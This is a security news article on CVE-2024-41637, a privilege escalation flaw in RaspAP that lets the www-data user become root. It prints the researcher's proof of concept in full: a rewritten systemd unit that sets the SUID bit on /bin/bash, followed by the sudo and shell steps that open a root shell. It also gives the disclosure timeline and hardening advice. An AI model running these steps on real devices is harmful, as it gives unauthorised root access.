Saturday, September 7, 2024
HomeCVE/vulnerabilityRaspAP Flaw Let Hackers Escalate Privileges with Raspberry Pi Devices

RaspAP Flaw Let Hackers Escalate Privileges with Raspberry Pi Devices

Published on

A critical local privilege escalation vulnerability has been discovered in RaspAP, an open-source project designed to transform Raspberry Pi devices into wireless access points or routers.

Identified as CVE-2024-41637, this flaw has been rated with a severity score of 9.9 (Critical) on the CVSS scale.

The vulnerability affected RaspAP versions before 3.1.5 and was disclosed publicly on July 27, 2024, after multiple attempts to contact the RaspAP security team went unanswered.

- Advertisement - EHA

CVE-2024-41637 – RaspAP Local Privilege Escalation

RaspAP is widely used in educational settings, IoT applications, and by homelab enthusiasts for its ease of configuring and managing wireless networks through a web interface.

According to the 0xZon report, the vulnerability stems from improper access controls, where the www-data user can write to the restapi.service file and execute critical commands with sudo privileges without a password.

This combination allows attackers to escalate their privileges from www-data to root, potentially leading to severe security breaches.

Join our free webinar to learn about combating slow DDoS attacks, a major threat today.

Exploitation Proof of Concept

Security researcher Aaron Haymore, who discovered the flaw, has provided a proof of concept (PoC) demonstrating how the vulnerability can be exploited.

The steps involve modifying the restapi.service file to execute arbitrary code with root privileges. Here’s a summary of the process:

  1. Edit the Service Configuration: As the www-data user, modify the restapi.service file located at /lib/systemd/system/restapi.service with the following configuration:
[Unit]
Description=Set SUID bit on /bin/bash
After=network.target

[Service]
Type=simple
ExecStart=/bin/bash -c 'echo "Service started. Use systemctl to stop the service to set the SUID bit on /bin/bash."'
ExecStop=/bin/bash -c 'chmod u+s /bin/bash'
Restart=always
RestartSec=1

[Install]
WantedBy=multi-user.target
  1. Reboot the Machine: Run the command sudo /sbin/reboot to reboot the machine and reload the daemon.
  2. Start the Modified Service: After rebooting, start the modified service using sudo /bin/systemctl start restapi.service.
  3. Stop the Service: To set the SUID bit, stop the service with sudo /bin/systemctl stop restapi.service.
  4. Gain Root Access: Execute /bin/bash -p to gain a root shell.

These steps illustrate how an attacker can exploit the vulnerability to gain root access, underscoring the critical nature of this security flaw.

Timeline and Response

The vulnerability was discovered and reported to the RaspAP security team on July 16, 2024. Despite multiple follow-up emails on July 18, 23, and 26, no response was received.

Consequently, the vulnerability was publicly disclosed on July 27, 2024. The RaspAP team’s lack of response highlights the importance of timely communication and addressing security issues promptly.

This vulnerability in RaspAP highlights the critical importance of correctly configuring access controls and user privileges within a system.

Allowing a low-privilege user like www-data to modify service files and use sudo without proper restrictions can lead to severe security breaches, including privilege escalation and arbitrary code execution.

To prevent such vulnerabilities, it is essential to adhere to the following best practices for access control:

  • Implement the Principle of Least Privilege: Ensure that users have only the minimal level of access necessary to perform their duties. Restrict write permissions to service files to only those who need them.
  • Audit and Restrict sudo Access: Regularly review sudoers configurations to ensure only trusted users can execute commands with elevated privileges. Avoid broad NOPASSWD configurations that can be exploited.
  • Secure Service Configurations: Ensure critical service configurations and scripts are protected from unauthorized modifications. Use appropriate file permissions and ownership settings.
  • Monitoring and Logging: Implement comprehensive logging and monitoring to detect and alert unauthorized changes or suspicious activities. Regularly review logs to catch potential exploitation attempts early.

By focusing on correct access controls and ensuring that permissions are appropriately configured, organizations can significantly reduce the risk of such vulnerabilities and maintain a more secure environment.

This case underscores the importance of diligently managing user privileges and access to critical system components.

Protect Your Business Emails From Spoofing, Phishing & BEC with AI-Powered Security | Free Demo

Divya
Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Latest articles

BBTok Abuses Legitimate Windows Utility Command Tool to Stay Undetected

Cybercriminals in Latin America have increased their use of phishing scams targeting business transactions...

Predator Spyware Exploiting “one-click” & “zero-click” Flaws

Recent research indicates that the Predator spyware, once thought to be inactive due to...

Tropic Trooper Attacks Government Organizations to Steal Sensitive Data

Tropic Trooper (aka KeyBoy, Pirate Panda, and APT23) is a sophisticated cyberespionage APT group,...

NoiseAttack is a Novel Backdoor That Uses Power Spectral Density For Evasion

NoiseAttack is a new method of secretly attacking deep learning models. It uses triggers...

Free Webinar

Decoding Compliance | What CISOs Need to Know

Non-compliance can result in substantial financial penalties, with average fines reaching up to $4.5 million for GDPR breaches alone.

Join us for an insightful panel discussion with Chandan Pani, CISO - LTIMindtree and Ashish Tandon, Founder & CEO – Indusface, as we explore the multifaceted role of compliance in securing modern enterprises.

Discussion points

The Role of Compliance
The Alphabet Soup of Compliance
Compliance
SaaS and Compliance
Indusface's Approach to Compliance

More like this

BBTok Abuses Legitimate Windows Utility Command Tool to Stay Undetected

Cybercriminals in Latin America have increased their use of phishing scams targeting business transactions...

Predator Spyware Exploiting “one-click” & “zero-click” Flaws

Recent research indicates that the Predator spyware, once thought to be inactive due to...

Tropic Trooper Attacks Government Organizations to Steal Sensitive Data

Tropic Trooper (aka KeyBoy, Pirate Panda, and APT23) is a sophisticated cyberespionage APT group,...